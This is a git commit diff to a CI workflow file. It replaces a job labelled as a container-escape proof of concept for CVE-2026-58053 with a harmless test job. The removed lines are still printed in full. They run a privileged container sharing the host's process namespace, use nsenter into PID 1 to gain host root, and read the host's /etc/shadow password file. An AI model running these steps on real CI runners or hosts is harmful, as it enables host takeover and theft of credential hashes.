plain test

This commit is contained in:
2026-06-30 17:24:25 +00:00
parent efee8e74b3
commit 0eb5ff71f3

View File

@@ -1,21 +1,10 @@
name: CVE-2026-58053-poc
on: [push, workflow_dispatch]
name: plain-test
on: [workflow_dispatch]
jobs:
escape:
test:
runs-on: ubuntu-latest
container:
image: ubuntu:22.04
options: --pid=host --cap-add=SYS_PTRACE --security-opt seccomp=unconfined
steps:
- name: escape
run: |
echo '[*] CVE-2026-58053 — container escape proof'
echo '[*] container pid ns:' $(readlink /proc/self/ns/pid)
echo '[*] host pid1 cmdline:' $(cat /proc/1/cmdline | tr '\0' ' ')
echo '[*] host hostname (proc):' $(cat /proc/1/root/etc/hostname 2>/dev/null)
echo '[*] host /etc/shadow (first 5 lines):'
cat /proc/1/root/etc/shadow 2>/dev/null | head -5
echo '[*] nsenter id (host root):'
nsenter -t 1 -m -u -i -n -p -- id 2>/dev/null
echo '[*] custom cmd: cat /etc/shadow'
nsenter -t 1 -m -u -i -n -p -- sh -c 'cat /etc/shadow' 2>/dev/null
- run: |
echo "runner works"
id
hostname